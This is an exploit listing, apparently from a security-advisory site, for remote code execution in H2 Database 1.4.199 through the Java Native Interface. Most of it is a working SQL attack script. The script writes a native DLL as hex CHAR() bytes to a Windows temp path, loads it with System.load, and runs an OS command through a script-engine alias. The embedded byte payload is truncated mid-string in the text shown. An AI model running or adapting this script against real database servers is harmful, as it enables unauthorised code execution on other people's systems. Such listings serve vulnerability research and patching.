H2 Database 1.4.199 JNI Code Execution

2021.01.07
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: H2 Database 1.4.199 - JNI Code Execution # Exploit Author: 1F98D # Original Author: Markus Wulftange # Date: 28 April 2020 # Vendor Hompage: https://www.h2database.com/ # Tested on: Windows 10 x64, Java 1.8, H2 1.4.199 # References: https://codewhitesec.blogspot.com/2019/08/exploit-h2-database-native-libraries-jni.html # H2 allows users to gain code execution by compiling and running Java code # however this requires the Java Compiler to be available on the machine running H2. # This exploit utilises the Java Native Interface to load a a Java class without # needing to use the Java Compiler -- Write native library SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', CHAR(0x4d),CHAR(0x5a),CHAR(0x90),CHAR(0x00),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0xff),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x0e),CHAR(0x1f),CHAR(0xba),CHAR(0x0e),CHAR(0x00),CHAR(0xb4),CHAR(0x09),CHAR(0xcd),CHAR(0x21),CHAR(0xb8),CHAR(0x01),CHAR(0x4c),CHAR(0xcd),CHAR(0x21),CHAR(0x54),CHAR(0x68),CHAR(0x69),CHAR(0x73),CHAR(0x20),CHAR(0x70),CHAR(0x72),CHAR(0x6f),CHAR(0x67),CHAR(0x72),CHAR(0x61),CHAR(0x6d),CHAR(0x20),CHAR(0x63),CHAR(0x61),CHAR(0x6e),CHAR(0x6e),CHAR(0x6f),CHAR(0x74),CHAR(0x20),CHAR(0x62),CHAR(0x65),CHAR(0x20),CHAR(0x72),CHAR(0x75),CHAR(0x6e),CHAR(0x20),CHAR(0x69),CHAR(0x6e),CHAR(0x20),CHAR(0x44),CHAR(0x4f),CHAR(0x53),CHAR(0x20),CHAR(0x6d),CHAR(0x6f),CHAR(0x64),CHAR(0x65),CHAR(0x2e),CHAR(0x0d),CHAR(0x0d),CHAR(0x0a),CHAR(0x24),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4e),CHAR(0xb0),CHAR(0xdb),CHAR(0x83),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x03),CHAR(0xa9),CHAR(0x26),CHAR(0xd0),CHAR(0x08),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb4),CHAR(0xd1),CHAR(0x08),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x51),CHAR(0xb9),CHAR(0xb4),CHAR(0xd1),CHAR(0x09),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x0a),CHAR(0xd1),CHAR(0xb4),CHAR(0xd0),CHAR(0x28),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb0),CHAR(0xd1),CHAR(0x01),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb1),CHAR(0xd1),CHAR(0x02),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb6),CHAR(0xd1),CHAR(0x08),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0xc8),CHAR(0xbe),CHAR(0xb1),CHAR(0xd1),CHAR(0x0b),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0xc8),CHAR(0xbe),CHAR(0xb5),CHAR(0xd1),CHAR(0x0b),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0xc8),CHAR(0xbe),CHAR(0xb7),CHAR(0xd1),CHAR(0x0b),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x52),CHAR(0x69),CHAR(0x63),CHAR(0x68),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x45),CHAR(0x00),CHAR(0x00),CHAR(0x64),CHAR(0x86),CHAR(0x05),CHAR(0x00),CHAR(0x1c),CHAR(0xe7),CHAR(0xa7),CHAR(0x5e),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x00),CHAR(0x22),CHAR(0x22),CHAR(0x20),CHAR(0x0b),CHAR(0x02),CHAR(0x0e),CHAR(0x19),CHAR(0x00),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x70),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x60),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),C -- Load native library CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load"; CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll'); -- Evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top